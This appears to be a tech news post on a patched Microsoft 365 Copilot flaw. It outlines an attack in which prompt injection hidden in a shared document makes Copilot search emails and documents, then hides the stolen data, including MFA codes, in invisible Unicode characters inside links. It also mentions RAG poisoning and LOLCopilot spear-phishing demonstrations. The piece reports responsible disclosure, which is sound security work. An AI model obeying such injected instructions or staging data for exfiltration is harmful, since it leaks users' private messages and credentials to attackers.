Microsoft has recently addressed a vulnerability in Microsoft 365 Copilot that could have enabled the theft of sensitive user information using a technique called ASCII smuggling. This vulnerability, now patched, highlights the ongoing challenges in securing artificial intelligence (AI) tools against sophisticated attacks.
What is ASCII smuggling?
ASCII smuggling is a novel technique that utilizes special Unicode characters that mirror ASCII but are not visible in the user interface. This allows attackers to embed invisible data within clickable hyperlinks, effectively staging the data for exfiltration.
How the attack works
The attack involves a series of steps:
- Trigger prompt injection: Malicious content concealed in a document shared on the chat triggers prompt injection.
- Search for emails and documents: A prompt injection payload instructs Copilot to search for more emails and documents.
- ASCII smuggling: The attacker uses ASCII smuggling to entice the user into clicking on a link, leading to the exfiltration of valuable data to a third-party server.
The outcome of this attack chain is the potential transmission of sensitive data, including multi-factor authentication (MFA) codes, to an adversary-controlled server.
Proof-of-concept attacks
Proof-of-concept (PoC) attacks have been demonstrated against Microsoft’s Copilot system, showcasing the ability to manipulate responses, exfiltrate private data, and dodge security protections. These methods, detailed by Zenity, include retrieval-augmented generation (RAG) poisoning and indirect prompt injection, which can lead to remote code execution attacks and fully control Microsoft Copilot and other AI apps.
Turning AI into a spear-phishing machine
One of the most novel attacks is the ability to turn the AI into a spear-phishing machine. The red-teaming technique, dubbed LOLCopilot, allows an attacker with access to a victim’s email account to send phishing messages mimicking the compromised user’s style.
Microsoft’s response
Microsoft has acknowledged the issues and addressed them following responsible disclosure in January 2024. The company has also highlighted the importance of evaluating risk tolerance and exposure to prevent data leaks from Copilots (formerly Power Virtual Agents) and enabling Data Loss Prevention and other security controls to control the creation and publication of Copilots.
The patching of the ASCII smuggling flaw in Microsoft 365 Copilot underscores the need for continuous monitoring and securing of AI tools against evolving threats. As AI technologies become more integrated into daily operations, the importance of robust security measures to protect sensitive user information cannot be overstated.
Discover more from Microsoft News Now
Subscribe to get the latest posts sent to your email.
